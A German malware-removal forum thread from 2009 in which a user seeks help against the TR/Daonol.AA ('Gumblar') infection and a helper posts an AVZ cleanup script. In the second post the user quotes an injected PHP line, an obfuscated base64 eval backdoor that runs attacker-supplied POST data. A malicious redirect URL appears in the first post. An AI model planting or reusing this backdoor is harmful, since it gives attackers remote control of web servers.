|
Plagegeister aller Art und deren Bekämpfung: TR/Daonol.AAWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
22.11.2009, 12:51 | #1 |
Gesperrt | TR/Daonol.AA moin, bin gerade auf euer board gestoßen.. habe mir etwas eingefangen, und bekomm´s net weg mein sys: -winxp, sygate, antivir ich beschreib mal kurz: -firewall lässt sich nicht starten -wmp classic funzt auch nicht -bei jeder 5ten oder 10ten googlesuche schmeißt er mich auf falsche seiten (zumbeispiel auf diese "http://popencoc.com/in.cgi?4¶meter=icq&ur=1&HTTP_REFERER=31201" wenn ich nach ICQ suche) -icq und andere programme stürzen öfter ab bisher erfolglos: -autoruns.exe zeigt mir nix komisches an -registry auch manuel durchsucht aber keine passenden einträge gefunden -alle plugins vom browser überprüft -autostart dateien und ordner(system.ini, etc) überprüft erfolgreich: -mit ad-aware habe ich gefährliche Cookies und einen Trojaner gelöscht, der Übeltäter nannte sich "TR/Daonol.AA" derzeitiger Status: -ik dachte der wäre weg, aber wenn ich mein browser starte, verhindert ad-aware das meine registry verändert wird, und danach springt antivir an und meldet mir eine Datei im c:\Programme -Ordner.. die danach sofort wieder verschwindet.. -ich nehme mal an, das der wurm sich in meiner registry drin stehen hat, das bei jedem browserstart der wurm sich wieder neu saugt... evtl tarnt er sich auch als ein signiertes plugin, was ich so nicht erkenne... meine frage.. kennt einer den wurm, was macht er und wo schreibt er sich überall fest thnx im voraus |
22.11.2009, 17:10 | #2 | ||
Gesperrt | TR/Daonol.AAZitat:
das ding nimmt anscheinend größere ausmaße... mein ganzer webserver is befallen in jeder html und php-file sind neue code-zeilen Code:
ATTFilter <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7' Zitat:
oder läuft bei meinem provider der wurm auf den servern? evtl bin ik ja jetz schon sauber, und hol mir das immer wieder durch mein webserver rein... |
23.11.2009, 12:41 | #3 |
Gesperrt | TR/Daonol.AA hallo, kennt einer den wurm?
__________________was schreibt der in die registry? wurde der wurm vom hacker auf meinem webserver platziert? keiner n plan, oder will mir keiner helfen? gebt ma feedback, dann lösch ik mich hier wieder |
23.11.2009, 12:57 | #4 |
/// AVZ-Toolkit Guru | TR/Daonol.AA Hallöle. Das du gereizt bist kann man verstehen. Wir machen uns die Arbeit hier aber ehrenamtlich und haben daher wenig Lust auf dumme Anmachen. Zügel deine schlechte Laune daher bitte ein wenig. Den Webserver solltest du natürlich vom Netz nehmen und neuaufsetzen. Poste bitte zwei AVZ logs wie in der Anleitung beschrieben.
__________________ - Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben - |
23.11.2009, 13:25 | #5 |
Gesperrt | TR/Daonol.AA war ja kene anmache und bin ja och nich gereizt, wollt nur ne info, warum allen nur mir nich geantwortet wird ejal/wayne mein webserver ist leider nur n gemieteter, bzw ich hab da nur n paar ordner... den betreiber hab ik schon informiert, aber auch noch keine rückmeldung erhalten.. neuaufsetzen is nich jut, da meine backups nich aktuell sind, mir bleibt wohl nix anderes übrig und alle dateien/scripte runterzuladen und mitn andern script nach den eintragungen suchen und rausnehmen lassen... dad mit AVZ werd ik glei ma machen |
23.11.2009, 13:51 | #6 |
Gesperrt | TR/Daonol.AA hier sind die logs, ik hab schonma als dank zweima auf die googlewerbung geklickt |
23.11.2009, 21:49 | #7 |
/// AVZ-Toolkit Guru | TR/Daonol.AA Führe bitte folgendes Skript aus: Code:
ATTFilter begin SearchRootkit(true, true); SetAVZGuardStatus(True); DeleteFile('C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA'); DelBHO('AutorunsDisabled'); DelBHO('710EB7A1-45ED-11D0-924A-0020AFC7AC4D'); QuarantineFile('C:\WINDOWS\system32\x264vfw.dll'); QuarantineFile('C:\WINDOWS\Installer\{90170407-6000-11D3-8CFE-0150048383C9}\misc.exe'); QuarantineFile('spse.sys'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Drivers32','midi9'); BC_ImportALL; ExecuteSysClean; ExecuteWizard('TSW', 3, 3, true); BC_Activate; RebootWindows(true); end. Code:
ATTFilter begin CreateQurantineArchive('C:\quarantine.zip'); end.
__________________ - Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben - |
23.11.2009, 21:55 | #8 | |
Gesperrt | TR/Daonol.AA "windows Scripting Host" ist bei mir deaktiviert/deinstalliert, gibts eine andere möglichkeit? vom webspace-anbieter hab ich die info bekommen, das nur ich betroffen bin. ich soll/werde n backup ziehen, bereinigen und neu aufspielen.. is nur übel bei ca 15 subdomains und lauter unterwebs(blogs,foren,etc)... es sind wirklich alle html,php und js-files betroffen.. das komische, es hat sich bisher keiner weiter eingelogt, und es sind bereits gesäuberte dateien wieder verseucht... Zitat:
Geändert von masterli (23.11.2009 um 22:03 Uhr) |
23.11.2009, 22:23 | #9 |
/// AVZ-Toolkit Guru | TR/Daonol.AA Du sollst das Skript mit AVZ ausführen. Oder geht das ohne den Skript Host nicht. Wenn nicht dann musst du ihn wieder aktivieren. Warum ist der deaktiviert??
__________________ - Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben - |
23.11.2009, 22:29 | #10 |
Gesperrt | TR/Daonol.AA deaktiviert, damit keine scripte nebenbei bei mir ausgeführt werden können, da ich dies nicht benötige und einige störenfriede so nicht aktiv werden können.. ach mit avz, jo das mach ich gleich mal ^^ |
23.11.2009, 22:53 | #11 |
Gesperrt | TR/Daonol.AA die 111111.com lässt sich nicht mehr starten, beim öffnen passiert nix, nichtmal ein task wird angezeigt, ich mach feierabend für heute.. bis morgen €dit:achso,ich kanns mir auch nicht neu saugen ->http501/505 |
24.11.2009, 16:30 | #12 |
/// AVZ-Toolkit Guru | TR/Daonol.AA Und, heute besser mit AVZ?
__________________ - Sämtliche Hilfestellungen im Forum werden ohne Gewährleistung oder Haftung gegeben - |
24.11.2009, 19:03 | #13 |
Gesperrt | TR/Daonol.AA es lässt sich nicht mehr starten... ich versuchs nochma neu zu saugen... das teil was ich mir und meinem server eingefangen hab nennt sich wohl "Gumblar" €dit: bekomme immer 501/505 error, kanns net mehr saugen und nicht starten... Geändert von masterli (24.11.2009 um 19:13 Uhr) |
24.11.2009, 22:02 | #14 |
Gesperrt | TR/Daonol.AA AVZ lässt sich nicht mehr starten oder downloaden, und "Malwarebytes' Anti-Malware" schließt sich nach 1sek automatisch... ad-aware und antivir laufen aber ohne probleme.... ich hab mein server bereinigt, wenn ich den hier noch drauf hab, war das alles um sonst, wa? |
25.11.2009, 00:33 | #15 |
Gesperrt | TR/Daonol.AA sry für die doppelposts, aber ich kann nicht mehr den beitrag editieren... ich wollte gerade mcafee saugen, komme aber nichtmal auf die homepage... ich habe mal ne txt-datei von "autoruns" mit angehangen, evtl findet ihr ja was, was ich im abgesicherten rauskannten kann.. ich will mein sys nicht neu machen |
Themen zu TR/Daonol.AA |
ad-aware, board, browser, dateien, eingefangen, einträge, falsche, falsche seite, falsche seiten, funzt, gefährliche, gelöscht, gen, manuel, neu, ordner, plugins, programme, seite, seiten, sygate, tr/daonol.aa, trojaner, verhindert, verändert, wurm |